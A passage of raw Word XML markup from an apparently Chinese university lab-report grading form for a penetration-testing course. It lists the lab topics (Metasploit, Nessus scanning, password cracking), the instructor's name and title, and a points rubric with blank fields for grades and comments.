                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">3年2月27日 — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3年3月10日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1936" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>实验内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6889" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="6"/>
              <w:spacing w:line="440" w:lineRule="exact"/>
              <w:ind w:firstLine="422"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>（一）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>渗透测试环境搭建</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="6"/>
              <w:spacing w:line="440" w:lineRule="exact"/>
              <w:ind w:firstLine="422"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>（二）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Metasploit渗透测试实践</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="6"/>
              <w:spacing w:line="440" w:lineRule="exact"/>
              <w:ind w:firstLine="422"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>（三）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Nessus漏洞扫描实践</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="6"/>
              <w:spacing w:line="440" w:lineRule="exact"/>
              <w:ind w:firstLine="422"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>（四）</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_Hlk102982554"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>密码破解实践</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520" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>指导教师（师傅）姓名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2186" w:type="dxa"/>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张文波</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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职务或职称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2435" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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讲师</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>指导教师（师傅）</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>对学生的评价</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2186" w:type="dxa"/>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评价点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>评价内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1159" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>评价得分</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="1012" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2186" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>平时成绩</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>（20分）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>投入学习时间、课堂纪律及学习态度、遵守实验室的规章制度等情况</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1159" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312"/>
                <w:b/>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986" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2186" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>实验能力</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>（20分）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>渗透测试环境搭建、Metasploit和Nessus</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>密码破解实践能力</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1159" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="985" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2186" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>实验验收</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>（20分）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>实验要求达成情况</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>实验演示与答辩情况</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1159" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312"/>
                <w:b/>
                <w:sz w:val="24"/>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971" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2186" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>实验报告</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>（40分）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>语言及文字表达能力</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>实验报告工作量及撰写规范性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1159" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="382" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>总评</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>成绩</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2158" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>五级制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2435" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>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2" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>指导教师（师傅）评语</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6889" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLine="2904" w:firstLineChars="1383"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>指导教师（师傅）签字</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLine="2904" w:firstLineChars="1383"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">                                   年     月        日</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-512" w:rightChars="-244"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId3" w:type="default"/>
          <w:footerReference r:id="rId4" w:type="default"/>
